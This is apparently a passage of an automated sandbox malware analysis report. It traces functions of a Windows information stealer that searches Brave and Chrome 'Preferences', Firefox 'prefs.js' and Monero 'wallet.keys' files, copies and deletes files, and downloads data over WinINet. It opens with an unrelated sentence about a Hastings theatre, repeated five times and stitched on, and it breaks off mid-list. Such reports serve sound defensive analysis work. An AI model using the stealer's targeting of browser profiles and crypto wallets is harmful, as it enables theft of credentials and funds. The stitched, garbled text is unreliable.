and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: e3db50b14bf05a533564389cc0a8f518f79ed1b6d30a12c6e1bb4b534cd6b02a
Instruction ID: ddbbeaccbd31291d5b57d41a47e217a7f08c08e012ff03441085b09008a59806
Opcode Fuzzy Hash: e3db50b14bf05a533564389cc0a8f518f79ed1b6d30a12c6e1bb4b534cd6b02a
Instruction Fuzzy Hash: 1041F7607CA6057ECE3CBBA4884EE9DB7E6DF4B704F6050C4A81876292CBB06F40C526

Function 00B8BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

FindFirstFileA.KERNEL32(00000000,?,00BA0B32,00BA0B2B,00000000,?,?,?,00BA13F4,00BA0B2A), ref: 00B8BEF5
StrCmpCA.SHLWAPI(?,00BA13F8), ref: 00B8BF4D
StrCmpCA.SHLWAPI(?,00BA13FC), ref: 00B8BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 00B8C7BF
FindClose.KERNEL32(000000FF), ref: 00B8C7D1

Strings

Google Chrome, xrefs: 00B8C634
Preferences, xrefs: 00B8C11E
Brave, xrefs: 00B8C102
\Brave\Preferences, xrefs: 00B8C1DB

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 3b6eed61dd0c54b966a070c9de049c1090a7451d934940705586d219c80deb6a
Instruction ID: 1ceede5a53bfe5f1e2ae21ce6891382dad11017f7af2b5072a7acbf0d5f2876d
Opcode Fuzzy Hash: 3b6eed61dd0c54b966a070c9de049c1090a7451d934940705586d219c80deb6a
Instruction Fuzzy Hash: F0422172910108ABDF14FBB4DD96EED73BDAB54300F4045E8B50AA6191EE349F49CBE2

Function 00B94910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00B9492C
FindFirstFileA.KERNEL32(?,?), ref: 00B94943
StrCmpCA.SHLWAPI(?,00BA0FDC), ref: 00B94971
StrCmpCA.SHLWAPI(?,00BA0FE0), ref: 00B94987
FindNextFileA.KERNEL32(000000FF,?), ref: 00B94B7D
FindClose.KERNEL32(000000FF), ref: 00B94B92

Strings

%s\*, xrefs: 00B94920
%s\%s, xrefs: 00B949A4
%s\%s, xrefs: 00B949FB

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: d627d83b55fff006f61ab5813d4b0788a15bc09fa816a5513352796c9f3ff80c
Instruction ID: 121a57055fbc3668e7158859dc6778c2577797db8402bb92fb898bfa53ab6699
Opcode Fuzzy Hash: d627d83b55fff006f61ab5813d4b0788a15bc09fa816a5513352796c9f3ff80c
Instruction Fuzzy Hash: 766164B1910219AFCB20EBA4DC49FEA73BCBB48704F0485D8B509D6151EB35DB45CFA1

Function 00B93EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00B93EC3
FindFirstFileA.KERNEL32(?,?), ref: 00B93EDA
StrCmpCA.SHLWAPI(?,00BA0FAC), ref: 00B93F08
StrCmpCA.SHLWAPI(?,00BA0FB0), ref: 00B93F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 00B9406C
FindClose.KERNEL32(000000FF), ref: 00B94081

Strings

%s\%s, xrefs: 00B93EB7

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: da0a473122ca512594d1dbe835cfc5184e6b505f64b714c01b7efc851fc132cb
Instruction ID: ad9a90fa430a09dd895607956646c13d713b050f97114742627449a01de86066
Opcode Fuzzy Hash: da0a473122ca512594d1dbe835cfc5184e6b505f64b714c01b7efc851fc132cb
Instruction Fuzzy Hash: 565162B2900219ABCB24FBB4DC85EEA73BCBB48304F0045D8B659D2150EB759B85CFA1

Function 00B8F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BA15B8,00BA0D96), ref: 00B8F71E
StrCmpCA.SHLWAPI(?,00BA15BC), ref: 00B8F76F
StrCmpCA.SHLWAPI(?,00BA15C0), ref: 00B8F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 00B8FAB1
FindClose.KERNEL32(000000FF), ref: 00B8FAC3

Strings

prefs.js, xrefs: 00B8F812

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c41a7c106f7c614f15fa1a6c0b8a5a7b702ba4af05b65ca9cbc48106e807d142
Instruction ID: fb02547979ccf59d9dc8219786170a59fe0375d15ee04479ac61c7e31e64e8f1
Opcode Fuzzy Hash: c41a7c106f7c614f15fa1a6c0b8a5a7b702ba4af05b65ca9cbc48106e807d142
Instruction Fuzzy Hash: 87B15F719102199BDF24FF64DC96EEE73B9AF55300F4085F8A40A96191EF30AB49CBD2

Function 00B816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BA510C,?,?,?,00BA51B4,?,?,00000000,?,00000000), ref: 00B81923
StrCmpCA.SHLWAPI(?,00BA525C), ref: 00B81973
StrCmpCA.SHLWAPI(?,00BA5304), ref: 00B81989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B81D40
DeleteFileA.KERNEL32(00000000), ref: 00B81DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00B81E20
FindClose.KERNEL32(000000FF), ref: 00B81E32

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Strings

\*.*, xrefs: 00B817F1

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 7c7e959151ecaba475cc6f23249db0b8938da155d3f77d517412bb95c7ef506a
Instruction ID: e0ad97783474e3a1e10f933cba169d7db2103cb9d26be7d70d77e20180358cc2
Opcode Fuzzy Hash: 7c7e959151ecaba475cc6f23249db0b8938da155d3f77d517412bb95c7ef506a
Instruction Fuzzy Hash: 7512BC719211189BDF15FB60DC96EEE73B8AF55300F4045E9A50AA6091EF306F8ACFE1

Function 00B8DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BA14B0,00BA0C2A), ref: 00B8DAEB
StrCmpCA.SHLWAPI(?,00BA14B4), ref: 00B8DB33
StrCmpCA.SHLWAPI(?,00BA14B8), ref: 00B8DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 00B8DDCC
FindClose.KERNEL32(000000FF), ref: 00B8DDDE

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 7a8d9f8995af42b4e23a815100225b6168cd908d499ae4dc33e9b381ddffe97f
Instruction ID: bbac9de86023a39985c4976b76e4a4e2e2bb05541a4b205b022fb5995af06e60
Opcode Fuzzy Hash: 7a8d9f8995af42b4e23a815100225b6168cd908d499ae4dc33e9b381ddffe97f
Instruction Fuzzy Hash: 1291257291011897CF14FBB4EC96DED73BDAF94300F4086A9F90A96191EE349B09CBD2

Function 00B860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
Part of subcall function 00B847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

InternetOpenA.WININET(00BA0DF7,00000001,00000000,00000000,00000000), ref: 00B8610F
StrCmpCA.SHLWAPI(?,0133E898), ref: 00B86147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B8618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B861B3
InternetReadFile.WININET(?,?,00000400,?), ref: 00B861DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B8620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00B86249
InternetCloseHandle.WININET(?), ref: 00B86253
InternetCloseHandle.WININET(00000000), ref: 00B86260

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
